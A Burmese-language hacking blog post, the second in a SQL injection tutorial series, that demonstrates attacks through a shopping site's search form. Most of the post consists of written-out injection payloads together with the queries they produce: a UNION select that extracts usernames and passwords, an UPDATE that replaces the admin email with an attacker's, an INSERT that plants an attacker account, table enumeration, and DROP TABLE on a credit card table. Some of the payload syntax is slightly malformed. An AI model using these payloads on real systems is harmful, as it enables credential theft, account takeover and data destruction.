SQLI Part 2 : Attacking Examples - 14 July 2012 - Blog

Site Menu
Home News Photo News Forum Guestbook Site News Publisher Contact Online Games Ad Board

Section categories

National News [13]

International News [1]

အႏုပညာ သတင္းမ်ား [1]

Hacking [30]

Search

Calendar

ေငြေၾကးလဲလွယ္ႏႈန္း

Social Bookmarks

Visitors
`Fast Counter`

Entries archive
2012 July

Your IP&OS

Mobile Application
ဖုန္း Application မ်ား freedownload ရယူႏုိင္ပါသည္။

စာအုပ္မ်ား

ျမန္မာဆိုက္မ်ား
ရတနာပံု ယခင္သတင္းစာမ်ားဖတ္ရန္ ထီေပါက္စဥ္တိုက္ရန္ ညိဳၾကီး လူဗိုလ္ ဟစ္တိုင္ ျပည္ေထာင္စုရာထူး၀န္အဖဲြ႔သို. ျမန္မာ႔အလင္း ေန.စဥ္ ရန္ကုန္ တိုင္း(မ္) ုျမန္မာတိုင္း(မ္) အင္တာနက္ဂ်ာနယ္ Learning English ေပၚျပဴလာဂ်ာနယ္ khitlunge Weather Forecast M Talk countrywatch finance channel-asia myanmardaily.net/News MRTV 4 hotnewsweekly 7daynews thevoiceweekly WeeklyEleven

Tag Board
Only authorized users can post messages

Saturday, 2025-06-28, 2:14 PM

Welcome To Devil's King Site!

Welcome Guest

Blog

RSS

Main » » SQLI Part 2 : Attacking Examples

9:14 PM

SQLI Part 2 : Attacking Examples

Part 1 : မွာေတာ့ SQL ဆိုတာဘာ MySQL ဆိုတာ ဘာ Query ေတြအေၾကာင္း နဲ႕ Attacking Example ႏွစ္ခုကို ေရးခဲ့ပါတယ္ ဒီေန႕ေတာ့ အျခားေသာ Attacking Example ေတြနဲ႕ Exploit ေတြကို ဆက္ပါ့မယ္ ။

ဒီ Tutorial မွာေတာ့ URL Bar မွာမဟုတ္ပဲ User Input ထည့္ခြင့္ရေသာ ေနရာမွန္သမွ် မွာ Inject လုပ္မယ့္ Attacking Mode ေတြကို Example ေတြနဲ႕ ေျပာျပပါ့မယ္ ။ ဥပမာ Search Box လိုေနရာမ်ိဳး Email Address Input လုပ္ရတဲ့ေနရာလိုမ်ိဳးမွာေပါ့

Shopping Site တစ္ခုရဲ႕ Search Form ဆိုပါစို႕ အဲ့ဒီ့ Search Form ဟာ ေစ်း၀ယ္တဲ့ User ေတြ ၀ယ္လို႕တဲ့ကုန္ပစၥည္းကို ရွာေဖြဖို႕လုပ္ထားတာပါ ဒါေပမယ့္ အဲ့ဒီ့ Search Form ဟာ Filter ခံဖို႕ လြတ္ေနပါတယ္ ဥပမာ ဒီလိုေပါ့

if (txtFilter.Text.Length > 0)(

strSQL += ” WHERE ProductName Like ‘” + txtFilter.Text + ‘”;)

အဲ့ဒါဆိုရင္ Attacker က

milk’ UNION Select 0, username,password 0 from users –

ဒီလို Query ေရးလိုက္ရင္ ( milk ဆိုတာ Example Item ပါ ) User Name Password ေတြ တက္လာပါလိမ့္မယ္ ။

အဲ့ဒီလိုပဲအျခားေသာ Attack အေနနဲ႕

4.Updating Table

ဒီတစ္ခါေတာ့ DataBase Table ၾကီးကို Update လုပ္ပစ္ပါ့မယ္ ဥပမာ.

milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –

ဒါကေတာ့ Example ပဲျပတာပါ site_email က Website Admin Mail ကို Attacker ေမးလ္ကို ေျပာင္းပစ္တဲ့ Example ပါ

အဲ့ဒီလို Inject လုပ္ရင္ Query မွာ

SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email = ‘milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –

ဒီလို Request ျဖစ္သြားတာေၾကာင့္ Table Update ျဖစ္သြားပါတယ္

5.Adding New Record

ဒီတစ္ခါေတာ့ DataBase မွာ Record အသစ္ထည့္မွာပါ

milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–

site_customer ထဲကို Attacker ဟာ သူ႕ရဲ႕ Record ေတြထည့္လုိက္တဲ့ Injecting Code ပါ အဲ့ဒီလို Inject လုပ္လုိက္ရင္ Query မွ

SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–

ျဖစ္ျပီး Record တစ္ခု ထပ္ထည့္ျပီးသားျဖစ္သြားပါလိမ့္မယ္ ။

6.Identifying Table

ဒီတစ္ခါေတာ့ Table တက္လာေအာင္လုပ္ၾကည့္ရေအာင္ ။

milk’ AND 1=(SELECT COUNT(*) FROM mytable); –

ဒီ Code ကိုသာ Inject လုပ္မယ္ဆုိရင္ Query မွာ

SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’ AND 1=(SELECT COUNT(*) FROM mytable); –

လို႕ Request လုပ္ျပီး Table ေတြတက္လာပါလိမ့္မယ္

7.Deleting Table

ဒီတစ္ခါေတာ့ Tabel ကို Delete လုပ္မွာပါ

milk’DROP TABLE Creditcard; –

ဒီ Code ကိုသာ Inject လုပ္လုိက္ရင္ SQL Query က

SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’DROP TABLE Creditcard; –

လို႕ Request လုပ္သြားျပီး Table ကို Delete လုပ္သြားပါ့မယ္

from www.ghostarea.net

Category: Hacking | Views: 414 | Added by: Snake | Tags: နည္းပညာ သတင္းမ်ား | Rating: 0.0/0

Total comments: 0